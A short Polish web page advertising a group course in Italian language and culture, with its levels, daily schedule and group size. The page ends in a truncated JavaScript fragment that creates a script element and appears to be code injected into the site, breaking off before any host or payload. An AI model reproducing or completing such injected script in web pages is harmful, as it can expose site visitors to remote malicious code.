Kurs podstawowy grupowy

Kurs podstawowy grupowy jest kursem ogólnym języka i kultury włoskiej. Jest dostępny przez cały rok dla studentów ze wszystkich poziomów, od podstawowego do zaawansowanego.

Zajęcia są od poniedziałku do piątku, od 9:20 do 13:00 (4 lekcje dziennie). Lekcja trwa 50 minut. Pierwsza część kursu to część dydaktyczna, od 9:20 do 11:00 i poświęcona jest gramatycznej budowie języka, druga część, od 11:20 do 13:00 jest poświęcona rozwoju komunikacji językowej poprzez dyskusje, role-plays, konwersacje, piosenki oraz zabawy grupowe

Kurs ten przewiduje uczestnictwo maksymalnie 10 studentów w grupie , pozwalając w ten sposób zaplanować nauczanie dydaktyczne i dać możliwości komunikacji językowej wszystkim

 [:]var d=document;var s=d.createElement(‘script’